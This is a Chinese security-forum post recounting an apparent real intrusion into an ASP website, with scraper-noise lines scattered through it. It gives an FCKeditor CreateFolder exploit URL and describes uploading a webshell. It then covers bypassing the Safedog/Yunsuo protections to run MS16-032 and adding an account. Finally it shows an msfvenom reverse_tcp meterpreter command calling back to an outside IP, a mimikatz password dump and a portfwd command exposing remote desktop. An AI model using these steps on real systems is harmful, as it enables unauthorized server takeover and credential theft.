找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 从getwebshell到绕过安全狗云锁提权再到利用matasploit ...
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2250|回复: 1
打印 上一主题 下一主题

从getwebshell到绕过安全狗云锁提权再到利用matasploit进服务器

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2018-10-20 20:31:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

! T: |7 S- ]) ^1 d/ Z2 P

! ~% Y: D' K2 A5 K3 _$ d0 i U/ P9 v& u! _% h( Y+ z3 ?1 O1 D4 r; m/ u2 J% _' E+ d8 A& x* z# W9 r! n, J7 L9 X3 U" ~+ E9 E- d% }
& s; V# u6 y3 X7 @2 w, b

+ T# H, T. I" w; F v/ D" S$ e
4 E5 |) K! a. Y; k9 }一、 利用getwebshell
# _2 G& k* o1 q; g/ f; b
' J. X+ n' { p: K g$ @3 R 首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
, ^6 A: c' @0 N
) u+ ~5 D* m6 |3 \222.png
; n! P( f. P/ X3 ^0 x N9 Y C 下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
@# o9 X( o( @. Q+ F( O" g333.png
) \* V3 [2 o' | ^/ ?% ?/ m8 c下面我们构造一个asp目录,如: / b! r# x" l3 c

m3 \ P/ h% i3 t' o+ S4 S" S# r: G$ x/ H" i

: k2 r" J+ P* k) A6 G5 `6 M, f. N http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 0 V- D7 v% D+ W$ L* F2 g4 G

5 D5 R+ X: ^/ z9 B

4 t4 c. y& u# M' }. {% I 然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
4 d" Z, q, o* j; ^6 W% r
' S5 @6 l% t! |5 O8 N) f 一、 绕过安全狗云锁提权并且加账号
7 t7 x( I3 ~- u& B( F9 @/ v 444.png
) Z7 D% h& X9 j" ?没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
@) }; a) p' z
& t" t5 l* I# ]; ]. @, w如图:
; R$ X' P, h) ~! X+ b555.png
6 j9 ]3 I8 A3 a: ^% o 然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
2 s# g9 Q ]& s% `, A* h( M
7 R$ o: F9 e( p4 b, A3 K 一、 利用metasploit
( R, A4 s! ]6 \7 v: M) t. ^. [; v
& o% c" j$ t) V# l5 w* e6 h 首先用pentestbox生成一个64位的payload如下命令
, y, i# Q6 o' H# d& c
* y) ]) ?5 m/ _7 V n G% J* K8 X0 QmsfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
) t: E7 f' U' w9 G7 e
5 x6 A4 @# m/ V A, C 为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
& ]5 X8 @$ ^3 L9 E' {4 D# Y 11.png
: m" k" F( Y( t8 e& | W- @下面我们用这个命令抓一下明文密码命令1use mimikatz 命令2kerberos如下图:
/ f$ j T: X! R$ ~6 S 13.png
# O' q& k/ R& t/ N. r( o$ p1 c 下面我们来做一个监听如下命令:
( \9 o+ U! d& G( C# P0 s
y1 H4 j5 r: I0 tportfwd add -l 6655 -p 3968 -r 127.0.0.1,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP6655端口如图:
# w5 P, O% C2 M1 q% ?% C 18.png ' s9 S0 `6 l5 z' N# t; Z6 }0 B' Q

% F! a: S, ? t% b, D. {
) k0 a+ T' P+ U! V' i# v+ N8 d! g

. \( q. }& J% V! K4 r

# R. ^) W) N8 m) i( N
2 N H3 `+ D" a) R% W
. o4 P {5 E, v0 q( @! h , {! D9 [; L# F+ u p

( \* X5 Z) |% E W+ l J
% k$ ^$ D5 H. |& \ . t3 ?" e1 W% W; j* S

. _. N& h. X, I0 g! {
; y! Z C9 y2 V! V3 b% V

回复

使用道具 举报

沙发
匿名  发表于 2021-11-20 23:30:06
图片怎么都没了
回复 支持 反对

使用道具

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表